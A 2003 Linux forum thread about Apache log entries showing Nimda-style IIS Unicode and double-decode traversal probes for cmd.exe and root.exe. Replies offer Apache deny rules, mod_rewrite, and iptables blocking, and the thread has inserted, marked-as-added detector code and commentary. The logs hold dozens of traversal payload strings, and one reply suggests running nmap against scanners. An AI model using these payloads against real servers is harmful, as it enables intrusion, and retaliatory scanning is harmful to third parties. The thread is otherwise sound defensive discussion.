LinuxQuestions.org
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 11-21-2003, 02:05 AM   #1
rajbaxi
Apache Log


I looked at my Apache Server log today and found:

68.43.98.93 - - [16/Nov/2003:07:25:46 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:49 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:51 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:53 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:57 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:04 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:06 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:08 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:10 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:12 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.98.93 - - [16/Nov/2003:07:26:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.98.93 - - [16/Nov/2003:07:26:16 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:18 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:49 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:51 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:35 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:36 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:36 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:39 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:39 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.44.168.38 - - [16/Nov/2003:12:44:41 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.44.168.38 - - [16/Nov/2003:12:44:41 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:50 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.10.31 - - [16/Nov/2003:14:17:55 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:55 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034

These don't look like legitimate HTTP requests to me (correct me if I'm wrong). If they're not, I would like to know a way to block them. Any ideas?
 
Old 11-21-2003, 04:52 AM   #2
jayjwa
Either:

A) A _really_ dumb script-kiddie is checking you, thinking he's got an IIS web server. Since it seems to combine several known exploits together, this may be a scanner of some sort, which would normally be used on one's OWN site to test it- instead someone used it on you.

B) The slightly newer x-site scripting exploit mixed in with A) (because of the vti_ crap). I had someone browsing my site, looking around, cool..... just before he left he fired off one of those.

C) Yet another version of the IIS unicode exploit is making its rounds. I posted it to usenet because people kept asking about it there. This doesn't appear to be a worm, since the worm that follows similar patterns only exhibits a very limited amount of code.

I moved my server up to 443, SSL'ed it just because I got tired of seeing that kinda stuff. If you're gonna attack me, _at least_ ID my system correctly. All the point -n- click scripts I've seen to do this kind of stuff don't bother with the https port, just straight http, and most people don't rewrite it to either. Take note of the IP address they're coming from. If you want to get fancy, make a custom error doc for anyone hitting on the /scripts/ directory (since an Apache server shouldn't have one by default) telling them just what you think of them. Just make sure the directory is never linked so that legit clients can't click to it. Then you'll know anyone landing in it is looking specially for it, most likely indicating an attempt to be naughty.
That's what I did.
 
Old 11-21-2003, 05:07 AM   #3
jayjwa
I checked, those are COMCAST addresses, people I've had trouble with before (if you didn't change the address, which it doesn't look like) so I don't think complaining to them will do any good. You can do this:

#Or whatever your webroot dir is
<Directory /var/www>
# Apache 1.3/2.x mod_access syntax: no space after the comma in Order
Order allow,deny
Allow from all
# A hostname in Deny forces a double reverse DNS lookup on every request
Deny from comcast.net
</Directory>

# And maybe one of these for the directories they like to play in
# Put something colorful in go-to-hell.html; keep it outside /scripts
# <Location /scripts> covers /scripts and everything under it
<Location /scripts>
Order deny,allow
Deny from all
# A local path is served with the 403; a full http:// URL is sent as a redirect instead
ErrorDocument 403 /go-to-hell.html
</Location>

If you've got PHP going, you should be able to use it in your error document too, and really be ready when they come, like log their IPs, insert their IP in an iptables black-list or a .htaccess list, or even launch nmap against them, etc.
 
Old 11-21-2003, 02:15 PM   #4
rajbaxi
I already know that they're from Comcast's IP block; however, if I block comcast.net then even I couldn't access my own site (not what I want). How do I do the iptables black-list?
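A worked example, added here and not part of the thread, that does in code what the first post and the question just above ask for: it parses access-log lines in Apache's common log format, decodes each path the way the targeted IIS decoder did (two percent-decoding passes, so %255c and %%35%63 both end up as a backslash, plus the lenient two-byte UTF-8 decoding that turns %c0%af into '/' and %c1%9c or %c1%1c into '\'), flags any request that walks above the document root or names cmd.exe/root.exe, counts hits per source address, and prints one iptables DROP line per scanner. The log lines inside it are constructed (a subset of those posted above plus two benign requests); the rule shape, the chain, and the three-hit threshold are my assumptions and not anything from the thread.

```python
"""Spot IIS Unicode / double-decode traversal probes in an Apache access log
and turn the offending source addresses into iptables rules.

Added example, not code from the thread. SAMPLE_LOG is constructed (a subset
of the posted lines plus two benign hits); the iptables rule shape and the
hit threshold are assumptions to adjust to the local firewall policy.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

SAMPLE_LOG = """\
68.43.98.93 - - [16/Nov/2003:07:25:46 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:04 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:08 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:12 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
10.0.0.5 - - [16/Nov/2003:09:00:00 -0500] "GET /index.html HTTP/1.1" 200 5120
10.0.0.5 - - [16/Nov/2003:09:00:01 -0500] "GET /images/logo.png HTTP/1.1" 200 2048
"""

# Common Log Format: ip ident user [ts] "METHOD path PROTO" status size
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TARGETS = re.compile(r'(cmd|root)\.exe', re.IGNORECASE)


def lenient_utf8(data: bytes) -> str:
    """Apply the plain 2-byte UTF-8 formula to any 0xC0-0xDF lead byte and
    whatever byte follows it, without rejecting overlong or malformed input.
    That leniency is what the IIS traversal relied on: %c0%af -> '/',
    %c1%9c -> '\\', even %c1%1c -> '\\'. Other bytes pass through unchanged."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def decode_path(raw: str, passes: int = 2) -> str:
    """Percent-decode up to `passes` times (IIS decoded twice, which is why
    %255c and %%35%63 both become a backslash), lenient UTF-8 after each pass."""
    s = raw
    for _ in range(passes):
        decoded = lenient_utf8(unquote_to_bytes(s))
        if decoded == s:
            break
        s = decoded
    return s


def escapes_root(path: str) -> bool:
    """True if the path ever climbs above the document root. A backslash
    counts as a separator because IIS treated it as one."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(line: str):
    """Parse one log line; return the decoded path and verdict, or None if
    the line is not in common log format."""
    m = CLF.match(line)
    if not m:
        return None
    path, _, query = m["path"].partition("?")
    decoded = decode_path(path)
    traversal = escapes_root(decoded)
    target = bool(TARGETS.search(decoded))
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "raw": m["path"],
        "decoded": decoded,
        "command": query,  # "/c+dir" in the posted lines: the shell command being run
        "traversal": traversal,
        "target": target,
        "suspicious": traversal or target,
    }


def scanner_ips(log_text: str, min_hits: int = 3) -> dict:
    """Suspicious requests per source IP, keeping only those at or above the
    (assumed) threshold so one odd URL does not get a host blocked."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        r = classify(line)
        if r and r["suspicious"]:
            hits[r["ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}


def iptables_rules(ips) -> list:
    """One DROP rule per scanner (assumed rule shape). Cable/dial-up addresses
    get reassigned, so rules like these go stale and need expiring."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(ips)]


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        r = classify(line)
        if r and r["suspicious"]:
            print(f'{r["ip"]} {r["raw"]} -> {r["decoded"]!r} traversal={r["traversal"]}')
    for rule in iptables_rules(scanner_ips(SAMPLE_LOG)):
        print(rule)
```

Two points worth keeping in mind when using something like this: the decoder deliberately reproduces the bug in the target, not Apache's behaviour, so it tells you what the scanner was trying to reach, not what your server did with it (Apache answered 404 or 400 to every one of these); and blocking by source address after the fact only stops the second visit from the same address, which on a dynamically assigned cable block may be a different customer by next week.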
 
Old 11-21-2003, 02:47 PM   #5
rajbaxi
what about non-existent /* locations such as www.server.com/non-existent? Can I do something for those?
 
Old 11-21-2003, 02:49 PM   #6
rajbaxi
jayjwa: part of my server is on ssl. however, I cannot move my server completely to https://servername.com because people who legitimately access my server have a hard enough time not typing in the www. prefix.
 
Old 11-21-2003, 04:21 PM   #7
rajbaxi
If it was a port scanner, are these valid IP Addresses? What port scanner could do this?
 
Old 11-25-2003, 08:59 AM   #8
sopiaz57
Although this is a fine thought, it is by no means an option. For one, each and every time you get a visitor Apache is going to have to check DNS and verify the IP. That's going to slow things down.

I suggest you focus your time on securing your system rather than worrying who is scanning your box. They can scan all they want, and you can never stop that. What else do you have running on the machine?

#Or whatever your webroot dir is
<Directory /var/www >
Order allow, deny
Allow from all
Deny from comcast.net
</Directory>
 
Old 11-25-2003, 03:53 PM   #9
rajbaxi
Quite a bit. However the Web Server and Mail Server (outgoing and incoming) are accessible over the internet.
 
Old 11-30-2003, 11:57 AM   #10
Belize
When I had Apache started I frequently had such stupid scans, even though I didn't maintain a website.
 
Old 03-21-2004, 10:01 PM   #11
rajbaxi
Okay... I found something where iptables can block by string matching at linuxsecurity.com. I downloaded the kernel source (version 2.4.21), iptables 1.2.7a, patch-o-matic-20030107, and FWSnort (contains the patch for string capability). I followed the guide exactly; however, when I tried to run "make KERNEL_DIR=../kernel_src", I get the following error:

[raj@chopin iptables-1.2.7a]$ make KERNEL_DIR=../linux-2.4.21
Extensions found: IPv6:ah IPv6:esp IPv6:frag IPv6:ipv6header IPv6:hbh IPv6:dst IPv6:rt
cc -O2 -Wall -Wunused -I../linux-2.4.21/include -Iinclude/ -DIPTABLES_VERSION=\"1.2.7a\" -fPIC -o extensions/libipt_ah_sh.o -c extensions/libipt_ah.c
In file included from ../linux-2.4.21/include/linux/config.h:4,
from ../linux-2.4.21/include/linux/netfilter_ipv4.h:8,
from ../linux-2.4.21/include/linux/netfilter_ipv4/ip_tables.h:25,
from include/libiptc/libiptc.h:6,
from include/iptables.h:5,
from extensions/libipt_ah.c:8:
/usr/include/linux/autoconf.h:1:2: #error Invalid kernel header included in userspace
make: *** [extensions/libipt_ah_sh.o] Error 1
[raj@chopin iptables-1.2.7a]$

I thought I was pretty linux savvy but kernel stuff just boggles my mind and I was hoping someone ran into this error, or can figure out what the hell is wrong.

Here is the link for the article: http://www.linuxsecurity.com/feature...story-148.html
 
Old 03-21-2004, 11:17 PM   #12
Capt_Caveman
It would probably be easier and less of a load on the server to use mod_rewrite to do that instead. Checking every packet for certain strings is a serious chore. Just turn on the rewrite engine, and add a rewrite rule that matches anything that has cmd.exe in it. That should handle most of the IIS exploits that try to fire back a command shell.

Btw, just briefly glancing at the exploit, that looks like several Nimda scans to me. While annoying, you will likely end up wasting a significant amount of resources in trying to stop harmless scans like that.
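The mod_rewrite rule described in the post above, written out as an added example that is not from the thread. It assumes Apache 2.x with mod_rewrite loaded and belongs in the server or virtual-host config. Both rules answer 403 before the filesystem is consulted: the first matches cmd.exe or root.exe anywhere in the path, case-insensitively, and the second matches the IIS-only top-level directories the scanner walks, none of which exist on a default Apache install.

```apache
RewriteEngine On

# Anything naming cmd.exe or root.exe, wherever it sits in the path.
# [NC] = case-insensitive, [F] = answer 403 Forbidden, [L] = stop rewriting.
RewriteRule (cmd|root)\.exe - [NC,F,L]

# IIS-only directories the scanner probes; Apache has none of these by default.
# ^/? keeps the pattern valid both in server config (leading slash present)
# and in .htaccess (leading slash and directory prefix stripped).
RewriteRule ^/?(scripts|msadc|_vti_bin|_mem_bin)(/|$) - [NC,F,L]
```

Apache decodes the URL-path once before RewriteRule sees it, so %255c arrives as the literal %5c and %c0%af as two raw bytes; that is why the match is on the cmd.exe/root.exe filename and the directory names rather than on the traversal sequence. The %%35%63 and %%35c variants in the posted log were already refused with 400 by the HTTP parser and never reach the rewrite engine. The requests are still written to access_log, now with a 403 instead of a 404; only the response changes, which is the point of doing this in the web server instead of inspecting every packet.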
 
Old 03-21-2004, 11:28 PM   #13
rajbaxi
Less of a load yes. But IPTables is pretty good at Packet Inspection. Thanks for the advice though.
 
  


All times are GMT -5. The time now is 05:42 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration